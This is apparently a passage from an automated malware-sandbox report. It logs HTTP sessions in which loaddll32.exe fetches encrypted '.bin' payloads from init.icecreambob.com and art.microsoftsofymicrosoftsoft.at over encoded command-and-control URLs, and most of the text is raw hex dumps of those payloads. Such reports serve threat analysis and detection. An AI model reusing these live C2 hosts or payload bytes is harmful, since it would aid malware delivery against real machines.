                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da
                                                          Oct 7, 2021 01:32:21.292890072 CEST2266INData Raw: e3 3c 24 a4 3d 22 2c 2e 83 f8 e6 8e 9e c0 04 5e b8 17 0d 39 14 b4 6e e2 07 92 b1 ff f7 ff 8e 9f d3 cb 01 09 1a c7 57 f6 2e ba a7 6f 9f 56 fa ec 6b 8c 57 5c 5d 4b 97 d8 4a ca 14 20 fa 24 a6 bf d0 95 7e 10 05 74 0a 32 23 e8 11 ee 42 c8 30 50 5a ed
                                                          Data Ascii: <$=",.^9nW.oVkW\]KJ $~t2#B0PZe,3!CbWF+15[2">!QUqVRs+f_:>>W%>upq<)IW'LQ]^<QO23'S~?+vR9?@8aLsGlYn3


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.449780194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:20.886424065 CEST2264OUTGET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.568727970 CEST2268INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e320583a02.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza
                                                          Oct 7, 2021 01:32:21.568784952 CEST2269INData Raw: 48 57 a9 2f 4c a2 4c 07 a3 1c 0f 34 9e a5 7a 23 91 f3 40 11 49 37 98 44 60 59 20 08 3d 94 df aa 6d 3b 7c f7 f7 89 91 f9 f1 f8 02 a8 c2 7c f4 d7 51 a4 cd 5e d0 e3 0b a4 17 ed 15 e5 93 70 53 b8 3d 71 04 2d 5f 39 37 24 85 22 cf 75 7e 96 87 dd 4f c3
                                                          Data Ascii: HW/LL4z#@I7D`Y =m;||Q^pS=q-_97$"u~OuhhqN N1tt.<n*(cY=`"DAi(%80X\m[bW+AC5*O/QXYb52'hKi:)l,-<P; b7BxXK|
                                                          Oct 7, 2021 01:32:21.568821907 CEST2270INData Raw: f2 80 cf 6d a8 ee f3 d2 ba 7c b3 24 3d 68 9a 82 2a 60 85 2f dc 11 f3 d3 53 ff cf 00 22 25 84 f9 25 54 51 bc 26 8a e6 16 82 c7 02 c2 f9 7c 30 8d 61 26 49 dd 0b 63 d3 f4 93 5e 67 94 0c c9 eb cf ab 72 26 07 fb 74 0e 66 1e f1 ee 28 c6 fc 13 19 4b 97
                                                          Data Ascii: m|$=h*`/S"%%TQ&|0a&Ic^gr&tf(KI#wK%uF>S"P[kD8,{)0S;CYA7r"Jx[Rhz\2Fpw8s,xgv<w.m= FFNjdNT,du$b{V
                                                          Oct 7, 2021 01:32:21.568861008 CEST2272INData Raw: f7 a9 67 36 b4 35 60 67 f6 b3 db 15 02 ca ef 82 02 39 86 36 eb 97 f4 19 b3 df ac 62 79 69 23 ae 4c 1c d9 f8 27 40 b4 ca 71 24 2b 94 ca bd 11 6b f7 10 a9 57 cb 80 17 85 45 f2 c2 97 d6 60 b4 9f da ef 9d 19 ca 58 d9 3f f3 af c7 a0 08 d3 ed f8 a6 ce
                                                          Data Ascii: g65`g96byi#L'@q$+kWE`X?VCI` 0U[U;5;S*7W(I pt*G/-[/B4,(W%HG||8hBuK{^m~o:n\70hGUu!J
                                                          Oct 7, 2021 01:32:21.568897009 CEST2273INData Raw: 1f a2 bb 51 3b 3b fc 03 f3 ac d4 b2 e7 2c 28 a1 18 08 b3 40 1a fb 48 43 76 af 34 5d 1f 25 c1 ed 85 84 e5 2a 1f ca d1 1d 78 84 e8 b3 e4 39 8f c5 cc fd 7f 5c 44 6f d0 96 b3 d9 0a 77 fd bb 0d 18 7c 91 b3 ff a9 e8 20 77 65 62 39 86 d3 d1 13 a1 a1 5e
                                                          Data Ascii: Q;;,(@HCv4]%*x9\Dow| web9^knwi3=*)CN"/.#l$|~0|LV0H..UgMA P29N=w|<7}vBR
                                                          Oct 7, 2021 01:32:21.568938971 CEST2275INData Raw: 72 1f ff f6 60 fd f7 af fb b2 94 3f 3f fe 24 83 55 06 5d d1 16 b2 14 fe e2 a8 f5 b7 f9 fa 35 c2 01 b5 da ed d8 e6 e3 fd 5b f2 04 7c 81 bc 81 8f 4c 4e fe 08 7a d9 e1 b6 f8 58 54 db c0 9d 4d 10 7e 6d ed d4 81 d8 ae 8c 91 d4 5f 2d e0 20 d7 89 6c a9
                                                          Data Ascii: r`??$U]5[|LNzXTM~m_- lg>X!?Q{b~Dz/Zu'.X+&n/ }|E&sa?^EPNyv=Jj{89snvU"VC!36
                                                          Oct 7, 2021 01:32:21.568977118 CEST2276INData Raw: 5f 8e fc e9 8a 59 e6 f4 27 6c f8 76 c5 36 39 7a e2 d8 88 b4 a0 1c bf 59 4e 8e 99 c9 bb 4c 21 b9 be a7 0f 58 db ad ab 31 7d 59 71 00 03 51 64 80 bf 22 d9 ab e8 a6 8c b6 2f 84 a8 b6 16 ab 80 b8 05 dd 47 57 d8 29 65 19 1a d1 a6 f1 77 68 e9 73 4c a9
                                                          Data Ascii: _Y'lv69zYNL!X1}YqQd"/GW)ewhsL"^?9?mvV(d)0Rpm7?'deTy4MlbLuU4h4`-[~m]P^k{':lUQSf/v
                                                          Oct 7, 2021 01:32:21.569017887 CEST2277INData Raw: a1 1d 28 79 3f d3 2e 2b c8 94 cf 20 0a d3 cd 6f 3c 27 bf 06 32 a4 de 26 68 b0 a2 48 df 2e 1c e7 63 5f 3f 81 6b e3 e4 19 64 74 88 18 4b af 22 52 c2 20 22 a5 f2 fb a1 75 4c cd 59 19 04 95 dd 6f e6 4b 5a ce 69 1f f7 3b 78 40 97 50 13 0c 3f 3d f2 1e
                                                          Data Ascii: (y?.+ o<'2&hH.c_?kdtK"R "uLYoKZi;x@P?=(6#+~3~q-^Ke!)F="vM!Ly(BK%SMj;=V+k@*^r4I??StUey#ggZFAc9t&rEI
                                                          Oct 7, 2021 01:32:21.569056988 CEST2279INData Raw: 3f aa 73 11 0d 57 14 b7 16 27 e9 b5 75 1c 37 e0 3d 9f 68 cd d4 5b e3 4a 31 ea 34 d5 4b 4e 34 a2 06 46 ea 52 44 df 5b f3 97 aa 9a 2f 92 4c c6 4e 3b ba f4 38 30 e3 cb 30 12 7e b3 d4 4b 54 6f 34 70 7e 90 94 76 cf 46 44 91 41 c0 d1 f6 42 61 c9 10 b3
                                                          Data Ascii: ?sW'u7=h[J14KN4FRD[/LN;800~KTo4p~vFDABa*cL(]D=A=p(j%v/hkvvKB^<s0:sNDg9e?ddIT}PA %gXr7(/IH[E!EdT]O"
                                                          Oct 7, 2021 01:32:21.569092989 CEST2280INData Raw: 1a 93 14 95 99 66 8e c9 d5 22 0f 0f 14 4f 08 4d 3b 95 ee 45 02 bd c4 96 f0 c3 a3 89 d8 32 21 6a ae 05 b7 1b 73 76 b7 a5 b5 12 e1 d6 bb 59 bb 7a be 71 fa f8 1e 35 4d d3 9c 92 d6 32 df e2 9c b4 24 c1 27 d4 68 b5 c7 e0 93 fe 73 cb 0a 76 72 53 61 4b
                                                          Data Ascii: f"OM;E2!jsvYzq5M2$'hsvrSaKXmcgPlL'9'"zDk"h5IA>!'6Qn =ds5}`VOts;{Mb|b7B?@QKfZbR0H1w.Ao08|*we >6^
                                                          Oct 7, 2021 01:32:21.618634939 CEST2282INData Raw: c4 6b 40 13 06 45 0a 3d 48 54 79 ff 92 84 a6 e6 01 d5 f4 11 74 8f 47 cd db d7 f7 26 22 2c a4 68 a4 29 14 96 6b 20 15 b5 ba 29 2a 95 a0 63 56 67 a6 e9 65 d2 c1 c4 b5 ad 73 3f 8a b5 1e 10 4e 99 43 a8 51 ee d5 aa 8f a8 52 10 fd 44 45 12 79 f5 9e 1f
                                                          Data Ascii: k@E=HTytG&",h)k )*cVges?NCQRDEy$,7:O Pq+U'/s*\|v$cP7xg.eH$%B2%bj]qZUEGzCEF@9J18GaapL9}NPD^az?0?P:


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.449781194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:32:23.671128988 CEST2525OUTGET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:24.126127005 CEST2527INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:24 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3208164af.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da
                                                          Oct 7, 2021 01:32:24.507015944 CEST2528INData Raw: e3 3c 24 a4 3d 22 2c 2e 83 f8 e6 8e 9e c0 04 5e b8 17 0d 39 14 b4 6e e2 07 92 b1 ff f7 ff 8e 9f d3 cb 01 09 1a c7 57 f6 2e ba a7 6f 9f 56 fa ec 6b 8c 57 5c 5d 4b 97 d8 4a ca 14 20 fa 24 a6 bf d0 95 7e 10 05 74 0a 32 23 e8 11 ee 42 c8 30 50 5a ed
                                                          Data Ascii: <$=",.^9nW.oVkW\]KJ $~t2#B0PZe,3!CbWF+15[2">!QUqVRs+f_:>>W%>upq<)IW'LQ]^<QO23'S~?+vR9?@8aLsGlYn3


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.449862194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 7, 2021 01:34:00.834180117 CEST10309OUTGET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:01.322679043 CEST10310INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.449863194.147.86.22180C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
